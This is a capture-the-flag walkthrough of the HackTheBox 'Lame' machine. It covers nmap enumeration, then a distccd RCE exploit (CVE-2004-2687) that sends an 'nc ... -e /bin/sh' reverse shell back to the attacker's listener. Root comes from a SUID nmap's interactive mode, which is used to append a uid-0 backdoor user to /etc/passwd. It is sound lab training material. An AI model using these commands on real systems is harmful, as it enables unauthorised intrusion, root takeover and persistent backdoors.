Lame

tags: HTB Easy Linux OSCP
Platform: Hackthebox
Difficult: Easy
S.O.: Linux

Enumeration

Nmap

At first, we need to discover the open ports

# nmap -p- -T4 10.10.10.3
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-12 16:46 CET
Nmap scan report for 10.10.10.3
Host is up (0.093s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3632/tcp open  distccd

Nmap done: 1 IP address (1 host up) scanned in 91.52 seconds

And now, let's explore deeper these ports.

# nmap -A -Pn -p 21,22,139,445,3632 10.10.10.3
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-12 16:48 CET
Nmap scan report for 10.10.10.3
Host is up (0.093s latency).

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.9
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: broadband router|remote management|WAP|printer|general purpose|power-device
Running (JUST GUESSING): Arris embedded (92%), Dell embedded (92%), Linksys embedded (92%), Tranzeo embedded (92%), Xerox embedded (92%), Linux 2.4.X|2.6.X (92%), Dell iDRAC 6 (92%), Raritan embedded (92%)
OS CPE: cpe:/h:dell:remote_access_card:6 cpe:/h:linksys:wet54gs5 cpe:/h:tranzeo:tr-cpq-19f cpe:/h:xerox:workcentre_pro_265 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:2.6.22 cpe:/o:linux:linux_kernel:2.6 cpe:/o:dell:idrac6_firmware
Aggressive OS guesses: Arris TG862G/CT cable modem (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Linux 2.4.27 (92%), Linux 2.6.22 (92%), Linux 2.6.27 - 2.6.28 (92%), Linux 2.6.8 - 2.6.30 (92%), Dell iDRAC 6 remote access controller (Linux 2.6) (92%), Raritan Dominion PX DPXR20-20L power control unit (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h35m06s, deviation: 3h32m11s, median: 5m03s
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name:
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2021-03-12T10:54:06-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 21/tcp)
HOP RTT      ADDRESS
1   92.90 ms 10.10.14.1
2   92.94 ms 10.10.10.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.84 seconds

Ok, as we can see, there is a distccd daemon running. Searchin in google, we can find a RCE exploit for it.

Exploitation

To get a shell, we only need to run a listener in a terminal and execute the exploit in another terminal.

# python distccd_rce_CVE-2004-2687.py -t 10.10.10.3 -p 3632 -c "10.10.14.9 8787 -e /bin/sh"
[OK] Connected to remote service

--- BEGIN BUFFER ---

#: 10.10.14.9: command not found

--- END BUFFER ---

[OK] Done.
root [EvilBook] (10.10.14.9) /tmp
# python distccd_rce_CVE-2004-2687.py -t 10.10.10.3 -p 3632 -c "nc 10.10.14.9 8787 -e /bin/sh"
[OK] Connected to remote service
[KO] Socket Timeout
# nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.3] 51687
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

And now, we can upgrade our shell with:

python -c "import pty; pty.spawn('/bin/bash')"
ctl+z
stty raw -echo
fg
reset
screen
export TERM=screen;export SHELL=/bin/bash;stty rows 60 columns 235
/bin/bash

To get the user flag, we only need to browse the makis home.

[email protected]:/home/makis$ cat user.txt
CENSORED_FLAG

Post exploitation

Enumeration

SUID

Between some SUID binaries, we can find that nmap is set as SUID.

[email protected]:/home/makis$ find / -perm /4000 2>/dev/null
.......................................................
.......................................................
/usr/bin/nmap
.......................................................
.......................................................

Privilege escalation

Is well known that nmap has an interactive mode and we can run shell commands inside it as root because it is setted as SUID.

[email protected]:/home/makis$ nmap --interactive

Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !whoami
root
system() execution of command failed
nmap>

As we can see, we can execute commands as root. Let's inject a user in /etc/passwd to login as root with it.

nmap> !echo "x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash" >> /etc/passwd
system() execution of command failed
nmap>
[email protected]:/home/makis$ su x4v1l0k
Password:
[email protected]:/home/makis# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/home/makis# cat /root/root.txt
CENSORED_FLAG
[email protected]:/home/makis#